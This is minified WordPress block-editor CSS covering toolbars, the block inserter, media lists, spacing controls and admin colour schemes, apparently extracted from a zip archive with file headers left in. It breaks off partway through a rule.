.block-editor-block-toolbar:focus,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover{scrollbar-color:#949494 #0000}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{will-change:transform}@media (hover:none){.block-editor-block-contextual-toolbar .block-editor-block-toolbar{scrollbar-color:#949494 #0000}}.block-editor-block-contextual-toolbar .block-editor-block-toolbar{scrollbar-gutter:auto}.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar-group:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child:after{display:none}.block-editor-block-contextual-toolbar>.block-editor-block-toolbar{flex-grow:0;width:auto}.block-editor-block-contextual-toolbar .block-editor-block-parent-selector{margin-bottom:-1px;margin-top:-1px;position:relative}.block-editor-block-contextual-toolbar .block-editor-block-parent-selector:after{align-items:center;background-color:#1e1e1e;border-radius:100%;content:"";display:inline-flex;height:2px;left:0;position:absolute;top:15px;width:2px}.block-editor-block-toolbar__block-controls .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.block-editor-block-toolbar__block-controls .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{margin:0!important;width:24px!important}.block-editor-block-toolbar__block-controls .components-toolbar-group{padding:0}.block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar-group{display:flex;flex-wrap:nowrap}.block-editor-block-toolbar__slot{display:inline-flex}.show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)){width:auto}.show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)) svg{display:none}.show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)):after{content:attr(aria-label);font-size:12px}.show-icon-labels .components-accessible-toolbar .components-toolbar-group>div:first-child:last-child>.components-button.has-icon{padding-left:6px;padding-right:6px}.show-icon-labels .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.show-icon-labels .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{height:0!important;min-width:0!important;width:0!important}.show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button{border-bottom-left-radius:0;border-top-left-radius:0;padding-left:12px;padding-right:12px;text-wrap:nowrap}.show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button .block-editor-block-icon{width:0}.show-icon-labels .block-editor-block-mover .block-editor-block-mover__move-button-container{position:relative;width:auto}@media (min-width:600px){.show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{background:#e0e0e0;content:"";height:1px;margin-top:-.5px;position:absolute;right:50%;top:50%;transform:translate(50%);width:100%}}@media (min-width:782px){.show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{background:#1e1e1e}}.show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover-button,.show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{padding-left:6px;padding-right:6px}.show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover-button{padding-left:8px;padding-right:8px}.show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-mover{border-right:1px solid #ddd;margin-left:-6px;margin-right:6px;white-space:nowrap}.show-icon-labels .block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon{padding-left:12px;padding-right:12px}.show-icon-labels .block-editor-block-contextual-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button.block-editor-block-mover-button{width:auto}.show-icon-labels .components-toolbar,.show-icon-labels .components-toolbar-group{flex-shrink:1}.show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button+.components-button{margin-right:6px}.block-editor-block-toolbar-change-design-content-wrapper{padding:12px;width:320px}.block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr 1fr;grid-gap:12px}.block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{min-height:100px}.block-editor-inserter{background:none;border:none;display:inline-block;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:0;padding:0}@media (min-width:782px){.block-editor-inserter{position:relative}}.block-editor-inserter__main-area{gap:16px;height:100%;position:relative}.block-editor-inserter__main-area.show-as-tabs{gap:0}@media (min-width:782px){.block-editor-inserter__main-area .block-editor-tabbed-sidebar{width:350px}}.block-editor-inserter__popover.is-quick .components-popover__content{border:none;box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003;outline:none}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>*{border-left:1px solid #ccc;border-right:1px solid #ccc}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:first-child{border-radius:4px 4px 0 0;border-top:1px solid #ccc}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:last-child{border-bottom:1px solid #ccc;border-radius:0 0 4px 4px}.block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>.components-button{border:1px solid #1e1e1e}.block-editor-inserter__popover .block-editor-inserter__menu{margin:-12px}.block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__tablist{top:60px}.block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__main-area{height:auto;overflow:visible}.block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__preview-container{display:none}.block-editor-inserter__toggle.components-button{align-items:center;border:none;cursor:pointer;display:inline-flex;outline:none;padding:0}@media not (prefers-reduced-motion){.block-editor-inserter__toggle.components-button{transition:color .2s ease}}.block-editor-inserter__menu{height:100%;overflow:visible;position:relative}@media (min-width:782px){.block-editor-inserter__menu.show-panel{width:630px}}.block-editor-inserter__inline-elements{margin-top:-1px}.block-editor-inserter__menu.is-bottom:after{border-bottom-color:#fff}.components-popover.block-editor-inserter__popover{z-index:99999}.block-editor-inserter__search{padding:16px 16px 0}.block-editor-inserter__no-tab-container{flex-grow:1;overflow-y:auto;position:relative}.block-editor-inserter__panel-header{align-items:center;display:inline-flex;padding:16px 16px 0;position:relative}.block-editor-inserter__panel-content{padding:16px}.block-editor-inserter__panel-title,.block-editor-inserter__panel-title button{color:#757575;font-size:11px;font-weight:500;margin:0 0 0 12px;text-transform:uppercase}.block-editor-inserter__panel-dropdown select.components-select-control__input.components-select-control__input.components-select-control__input{height:36px;line-height:36px}.block-editor-inserter__panel-dropdown select{border:none}.block-editor-inserter__reusable-blocks-panel{position:relative;text-align:left}.block-editor-inserter__no-results,.block-editor-inserter__patterns-loading{padding:32px;text-align:center}.block-editor-inserter__child-blocks{padding:0 16px}.block-editor-inserter__parent-block-header{align-items:center;display:flex}.block-editor-inserter__parent-block-header h2{font-size:13px}.block-editor-inserter__parent-block-header .block-editor-block-icon{margin-left:8px}.block-editor-inserter__preview-container__popover{top:16px!important}.block-editor-inserter__preview-container{display:none;max-height:calc(100% - 32px);overflow-y:hidden;padding:16px;width:280px}@media (min-width:782px){.block-editor-inserter__preview-container{display:block}}.block-editor-inserter__preview-container .block-editor-inserter__media-list__list-item{height:100%}.block-editor-inserter__preview-container .block-editor-block-card{padding-bottom:4px;padding-left:0;padding-right:0}.block-editor-inserter__insertable-blocks-at-selection{border-bottom:1px solid #e0e0e0}.block-editor-inserter__block-patterns-tabs-container,.block-editor-inserter__media-tabs-container{display:flex;flex-direction:column;flex-grow:1;justify-content:space-between;padding:16px}.block-editor-inserter__category-tablist{margin-bottom:8px}.block-editor-inserter__category-panel{display:flex;flex-direction:column;outline:1px solid #0000;padding:0 16px}@media (min-width:782px){.block-editor-inserter__category-panel{background:#f0f0f0;border-right:1px solid #e0e0e0;border-top:1px solid #e0e0e0;height:calc(100% + 1px);padding:0;position:absolute;right:350px;top:-1px;width:280px}.block-editor-inserter__category-panel .block-editor-block-patterns-list,.block-editor-inserter__category-panel .block-editor-inserter__media-list{padding:0 24px 16px}}.block-editor-inserter__patterns-category-panel-header{padding:8px 0}@media (min-width:782px){.block-editor-inserter__patterns-category-panel-header{padding:8px 24px}}.block-editor-inserter__patterns-category-no-results{margin-top:24px}.block-editor-inserter__patterns-filter-help{border-top:1px solid #ddd;color:#757575;min-width:280px;padding:16px}.block-editor-block-patterns-list,.block-editor-inserter__media-list{flex-grow:1;height:100%;overflow-y:auto}.block-editor-inserter__preview-content{align-items:center;background:#f0f0f0;display:grid;flex-grow:1}.block-editor-inserter__preview-content-missing{align-items:center;background:#f0f0f0;border-radius:2px;color:#757575;display:flex;flex:1;justify-content:center;min-height:144px}.block-editor-inserter__tips{border-top:1px solid #ddd;flex-shrink:0;padding:16px;position:relative}.block-editor-inserter__quick-inserter{max-width:100%;width:100%}@media (min-width:782px){.block-editor-inserter__quick-inserter{width:350px}}.block-editor-inserter__quick-inserter-results .block-editor-inserter__panel-header{float:right;height:0;padding:0}.block-editor-inserter__quick-inserter.has-expand .block-editor-inserter__panel-content,.block-editor-inserter__quick-inserter.has-search .block-editor-inserter__panel-content{padding:16px}.block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list{display:grid;grid-template-columns:1fr 1fr;grid-gap:8px}.block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{margin-bottom:0}.block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{min-height:100px}.block-editor-inserter__quick-inserter-separator{border-top:1px solid #ddd}.block-editor-inserter__popover.is-quick>.components-popover__content{padding:0}.block-editor-inserter__quick-inserter-expand.components-button{background:#1e1e1e;border-radius:0;color:#fff;display:block;width:100%}.block-editor-inserter__quick-inserter-expand.components-button:hover{color:#fff}.block-editor-inserter__quick-inserter-expand.components-button:active{color:#ccc}.block-editor-inserter__quick-inserter-expand.components-button.components-button:focus:not(:disabled){background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color);box-shadow:none}.block-editor-block-patterns-explorer__sidebar{bottom:0;overflow-x:visible;overflow-y:auto;padding:24px 32px 32px;position:absolute;right:0;top:72px;width:280px}.block-editor-block-patterns-explorer__sidebar__categories-list__item{display:block;height:48px;text-align:right;width:100%}.block-editor-block-patterns-explorer__search{margin-bottom:32px}.block-editor-block-patterns-explorer__search-results-count{padding-bottom:32px}.block-editor-block-patterns-explorer__list{margin-right:280px;padding:24px 0 32px}.block-editor-block-patterns-explorer__list .block-editor-patterns__sync-status-filter .components-input-control__container{width:380px}.block-editor-block-patterns-explorer .block-editor-block-patterns-list{display:grid;grid-gap:32px;grid-template-columns:repeat(1,1fr);margin-bottom:16px}@media (min-width:1080px){.block-editor-block-patterns-explorer .block-editor-block-patterns-list{grid-template-columns:repeat(2,1fr)}}@media (min-width:1440px){.block-editor-block-patterns-explorer .block-editor-block-patterns-list{grid-template-columns:repeat(3,1fr)}}.block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{min-height:240px}.block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{height:inherit;max-height:800px;min-height:100px}.components-heading.block-editor-inserter__patterns-category-panel-title{font-weight:500}.block-editor-inserter__media-library-button.components-button,.block-editor-inserter__patterns-explore-button.components-button{justify-content:center;margin-top:16px;padding:16px;width:100%}.block-editor-inserter__media-panel{display:flex;flex-direction:column;min-height:100%;padding:0 16px}@media (min-width:782px){.block-editor-inserter__media-panel{padding:0}}.block-editor-inserter__media-panel .block-editor-inserter__media-panel-spinner{align-items:center;display:flex;flex:1;height:100%;justify-content:center}.block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{margin-bottom:24px}@media (min-width:782px){.block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{margin-bottom:0;padding:16px 24px}}.block-editor-inserter__media-list__list-item{cursor:pointer;margin-bottom:24px;position:relative}.block-editor-inserter__media-list__list-item.is-placeholder{min-height:100px}.block-editor-inserter__media-list__list-item[draggable=true] .block-editor-inserter__media-list__list-item{cursor:grab}.block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview>*{outline-color:#0000004d}.block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview-options>button{display:block}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options{left:8px;position:absolute;top:8px}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button{background:#fff;display:none}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button.is-opened,.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:focus{display:block}.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:hover{box-shadow:inset 0 0 0 2px #fff,0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.block-editor-inserter__media-list__item{height:100%}.block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview{align-items:center;border-radius:2px;display:flex;overflow:hidden}.block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview>*{margin:0 auto;max-width:100%;outline:1px solid #0000001a;outline-offset:-1px}.block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview .block-editor-inserter__media-list__item-preview-spinner{align-items:center;background:#ffffffb3;display:flex;height:100%;justify-content:center;pointer-events:none;position:absolute;width:100%}.block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1);outline-width:var(--wp-admin-border-width-focus)}@media not (prefers-reduced-motion){.block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{transition:outline .1s linear}}.block-editor-inserter__media-list__item-preview-options__popover .components-menu-item__button .components-menu-item__item{min-width:auto}.block-editor-inserter__mobile-tab-navigation{height:100%;padding:16px}.block-editor-inserter__mobile-tab-navigation>*{height:100%}@media (min-width:600px){.block-editor-inserter-media-tab-media-preview-inserter-external-image-modal{max-width:480px}}.block-editor-inserter-media-tab-media-preview-inserter-external-image-modal p{margin:0}.block-editor-inserter__hint{margin:16px 16px 0}.block-editor-patterns__sync-status-filter .components-input-control__container select.components-select-control__input{height:40px}.block-editor-inserter__pattern-panel-placeholder{display:none}.block-editor-inserter__menu.is-zoom-out{display:flex}@media (min-width:782px){.block-editor-inserter__menu.is-zoom-out.show-panel:after{content:"";display:block;height:100%;width:300px}}@media (max-width:959px){.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{flex-direction:column}}.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{flex-direction:column}.block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{display:none;padding:0 24px 16px}@media (min-width:480px){.block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{display:block}}.spacing-sizes-control{border:0;margin:0;padding:0}.spacing-sizes-control .spacing-sizes-control__custom-value-input,.spacing-sizes-control .spacing-sizes-control__label{margin-bottom:0}.spacing-sizes-control .spacing-sizes-control__custom-value-range,.spacing-sizes-control .spacing-sizes-control__range-control{flex:1;margin-bottom:0}.spacing-sizes-control__header{height:16px;margin-bottom:12px}.spacing-sizes-control__dropdown{height:24px}.spacing-sizes-control__custom-select-control,.spacing-sizes-control__custom-value-input{flex:1}.spacing-sizes-control__custom-toggle,.spacing-sizes-control__icon{flex:0 0 auto}.spacing-sizes-control__icon{margin-right:-4px}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-coffee{--wp-admin-border-width-focus:1.5px}}body.admin-color-ectoplasm{--wp-admin-theme-color:#523f6d;--wp-admin-theme-color--rgb:82,63,109;--wp-admin-theme-color-darker-10:#46365d;--wp-admin-theme-color-darker-10--rgb:69.8430232558,53.6598837209,92.8401162791;--wp-admin-theme-color-darker-20:#3a2c4d;--wp-admin-theme-color-darker-20--rgb:57.6860465116,44.3197674419,76.6802325581;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ectoplasm{--wp-admin-border-width-focus:1.5px}}body.admin-color-midnight{--wp-admin-theme-color:#e14d43;--wp-admin-theme-color--rgb:225,77,67;--wp-admin-theme-color-darker-10:#dd382d;--wp-admin-theme-color-darker-10--rgb:221.4908256881,56.1788990826,45.0091743119;--wp-admin-theme-color-darker-20:#d02c21;--wp-admin-theme-color-darker-20--rgb:207.8348623853,44.2201834862,33.1651376147;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-midnight{--wp-admin-border-width-focus:1.5px}}body.admin-color-ocean{--wp-admin-theme-color:#627c83;--wp-admin-theme-color--rgb:98,124,131;--wp-admin-theme-color-darker-10:#576e74;--wp-admin-theme-color-darker-10--rgb:87.0873362445,110.192139738,116.4126637555;--wp-admin-theme-color-darker-20:#4c6066;--wp-admin-theme-color-darker-20--rgb:76.1746724891,96.384279476,101.8253275109;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-ocean{--wp-admin-border-width-focus:1.5px}}body.admin-color-sunrise{--wp-admin-theme-color:#dd823b;--wp-admin-theme-color--rgb:221,130,59;--wp-admin-theme-color-darker-10:#d97426;--wp-admin-theme-color-darker-10--rgb:216.8782608696,116.1847826087,37.6217391304;--wp-admin-theme-color-darker-20:#c36922;--wp-admin-theme-color-darker-20--rgb:195.147826087,104.5434782609,33.852173913;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-sunrise{--wp-admin-border-width-focus:1.5px}}PK!ܕEE/dist/block-editor/default-editor-styles-rtl.cssnuȯbody{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:18px; line-height:1.5; --wp--style--block-gap:2em; } p{ line-height:1.8; } .editor-post-title__block{ font-size:2.5em; font-weight:800; margin-bottom:1em; margin-top:2em; }PK!Q{&  dist/block-editor/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .block-editor-autocompleters__block{ white-space:nowrap; } .block-editor-autocompleters__block .block-editor-block-icon{ margin-right:8px; } .block-editor-autocompleters__block[aria-selected=true] .block-editor-block-icon{ color:inherit !important; } .block-editor-autocompleters__link{ white-space:nowrap; } .block-editor-autocompleters__link .block-editor-block-icon{ margin-right:8px; } .block-editor-global-styles-background-panel__inspector-media-replace-container{ border:1px solid #ddd; border-radius:2px; grid-column:1 / -1; position:relative; } .block-editor-global-styles-background-panel__inspector-media-replace-container.is-open{ background-color:#f0f0f0; } .block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item{ border:0; flex-grow:1; } .block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{ display:block; } .block-editor-global-styles-background-panel__inspector-media-replace-container .block-editor-global-styles-background-panel__inspector-preview-inner{ height:100%; } .block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown{ display:block; } .block-editor-global-styles-background-panel__inspector-media-replace-container .components-dropdown .block-editor-global-styles-background-panel__dropdown-toggle{ height:40px; } .block-editor-global-styles-background-panel__image-tools-panel-item{ border:1px solid #ddd; grid-column:1 / -1; position:relative; } .block-editor-global-styles-background-panel__image-tools-panel-item .components-drop-zone__content-icon{ display:none; } .block-editor-global-styles-background-panel__image-tools-panel-item .components-dropdown{ display:block; } .block-editor-global-styles-background-panel__image-tools-panel-item button.components-button{ color:#1e1e1e; display:block; width:100%; } .block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:hover{ color:var(--wp-admin-theme-color); } .block-editor-global-styles-background-panel__image-tools-panel-item button.components-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading{ height:100%; padding:10px 0 0; position:absolute; width:100%; z-index:1; } .block-editor-global-styles-background-panel__image-tools-panel-item .block-editor-global-styles-background-panel__loading svg{ margin:0; } .block-editor-global-styles-background-panel__dropdown-toggle{ background:#0000; border:none; cursor:pointer; height:100%; padding-left:12px; padding-right:32px; width:100%; } .block-editor-global-styles-background-panel__reset{ margin:auto 8px; opacity:0; position:absolute; right:0; top:8px; } @media not (prefers-reduced-motion){ .block-editor-global-styles-background-panel__reset{ transition:opacity .1s ease-in-out; } } .block-editor-global-styles-background-panel__reset.block-editor-global-styles-background-panel__reset{ border-radius:2px; } .block-editor-global-styles-background-panel__dropdown-toggle:hover+.block-editor-global-styles-background-panel__reset,.block-editor-global-styles-background-panel__reset:focus,.block-editor-global-styles-background-panel__reset:hover{ opacity:1; } @media (hover:none){ .block-editor-global-styles-background-panel__reset{ opacity:1; } } .block-editor-global-styles-background-panel__inspector-media-replace-title{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-editor-global-styles-background-panel__inspector-preview-inner .block-editor-global-styles-background-panel__inspector-image-indicator-wrapper{ height:20px; min-width:auto; width:20px; } .block-editor-global-styles-background-panel__inspector-image-indicator{ background-size:cover; border-radius:50%; display:block; height:20px; position:relative; width:20px; } .block-editor-global-styles-background-panel__inspector-image-indicator:after{ border:1px solid #0000; border-radius:50%; bottom:-1px; box-shadow:inset 0 0 0 1px #0003; box-sizing:inherit; content:""; left:-1px; position:absolute; right:-1px; top:-1px; } .block-editor-global-styles-background-panel__dropdown-content-wrapper{ min-width:260px; overflow-x:hidden; } .block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker-wrapper{ background-color:#f0f0f0; border:1px solid #ddd; border-radius:2px; width:100%; } .block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker__media--image{ max-height:180px; } .block-editor-global-styles-background-panel__dropdown-content-wrapper .components-focal-point-picker:after{ content:none; } .modal-open .block-editor-global-styles-background-panel__popover{ z-index:159890; } .block-editor-global-styles-background-panel__media-replace-popover .components-popover__content{ width:226px; } .block-editor-global-styles-background-panel__media-replace-popover .components-button{ padding:0 8px; } .block-editor-global-styles-background-panel__media-replace-popover .components-button .components-menu-items__item-icon.has-icon-right{ margin-left:16px; } .block-editor-block-alignment-control__menu-group .components-menu-item__info{ margin-top:0; } iframe[name=editor-canvas]{ box-sizing:border-box; display:block; height:100%; width:100%; } @media not (prefers-reduced-motion){ iframe[name=editor-canvas]{ transition:all .4s cubic-bezier(.46, .03, .52, .96); } } iframe[name=editor-canvas]{ background-color:var(--wp-editor-canvas-background); } .block-editor-block-icon{ align-items:center; display:flex; height:24px; justify-content:center; width:24px; } .block-editor-block-icon.has-colors svg{ fill:currentColor; } @media (forced-colors:active){ .block-editor-block-icon.has-colors svg{ fill:CanvasText; } } .block-editor-block-icon svg{ max-height:24px; max-width:24px; min-height:20px; min-width:20px; } .block-editor-block-inspector p:not(.components-base-control__help){ margin-top:0; } .block-editor-block-inspector h2,.block-editor-block-inspector h3{ color:#1e1e1e; font-size:13px; margin-bottom:1.5em; } .block-editor-block-inspector .block-editor-html-element-control:where(:not(:last-child)),.block-editor-block-inspector .block-editor-image-size-control:where(:not(:last-child)),.block-editor-block-inspector .components-base-control:where(:not(:last-child)),.block-editor-block-inspector .components-radio-control:where(:not(:last-child)){ margin-bottom:16px; } .block-editor-block-inspector .block-editor-html-element-control .components-base-control,.block-editor-block-inspector .block-editor-image-size-control .components-base-control,.block-editor-block-inspector .components-focal-point-picker-control .components-base-control,.block-editor-block-inspector .components-query-controls .components-base-control,.block-editor-block-inspector .components-range-control .components-base-control{ margin-bottom:0; } .block-editor-block-inspector .components-panel__body{ border:none; border-top:1px solid #e0e0e0; margin-top:-1px; } .block-editor-block-inspector__no-block-tools,.block-editor-block-inspector__no-blocks{ background:#fff; display:block; font-size:13px; padding:32px 16px; text-align:center; } .block-editor-block-inspector__no-block-tools{ border-top:1px solid #ddd; } .block-editor-block-inspector-edit-contents-button{ justify-content:center; margin-top:8px; } .block-editor-block-list__insertion-point{ bottom:0; left:0; position:absolute; right:0; top:0; } .block-editor-block-list__insertion-point-indicator{ background:var(--wp-admin-theme-color); border-radius:2px; opacity:0; position:absolute; transform-origin:center; will-change:transform, opacity; } .block-editor-block-list__insertion-point.is-vertical>.block-editor-block-list__insertion-point-indicator{ height:4px; top:calc(50% - 2px); width:100%; } .block-editor-block-list__insertion-point.is-horizontal>.block-editor-block-list__insertion-point-indicator{ bottom:0; left:calc(50% - 2px); top:0; width:4px; } .block-editor-block-list__insertion-point-inserter{ display:none; position:absolute; will-change:transform; } @media (min-width:480px){ .block-editor-block-list__insertion-point-inserter{ display:flex; } } .block-editor-block-list__insertion-point-inserter{ justify-content:center; left:calc(50% - 12px); top:calc(50% - 12px); } .block-editor-block-list__block-side-inserter-popover .components-popover__content>div{ pointer-events:none; } .block-editor-block-list__block-side-inserter-popover .components-popover__content>div>*{ pointer-events:all; } .block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter{ line-height:0; position:absolute; right:0; top:0; } .block-editor-block-list__empty-block-inserter.block-editor-block-list__empty-block-inserter:disabled{ display:none; } .block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{ background:#1e1e1e; color:#fff; height:24px; min-width:24px; padding:0; } .block-editor-block-list__empty-block-inserter .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{ background:var(--wp-admin-theme-color); color:#fff; } .block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon{ background:var(--wp-admin-theme-color); } .block-editor-block-list__insertion-point-inserter .block-editor-inserter__toggle.components-button.has-icon:hover{ background:#1e1e1e; } @keyframes hide-during-dragging{ to{ position:fixed; transform:translate(9999px, 9999px); } } .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar{ border:1px solid #1e1e1e; border-radius:2px; margin-bottom:8px; margin-top:8px; overflow:visible; pointer-events:all; position:static; width:auto; } .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{ margin-left:56px; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-contextual-toolbar.has-parent{ margin-left:0; } .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar{ overflow:visible; } .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar,.components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar .components-toolbar-group{ border-right-color:#1e1e1e; } .components-popover.block-editor-block-list__block-popover.is-insertion-point-visible{ 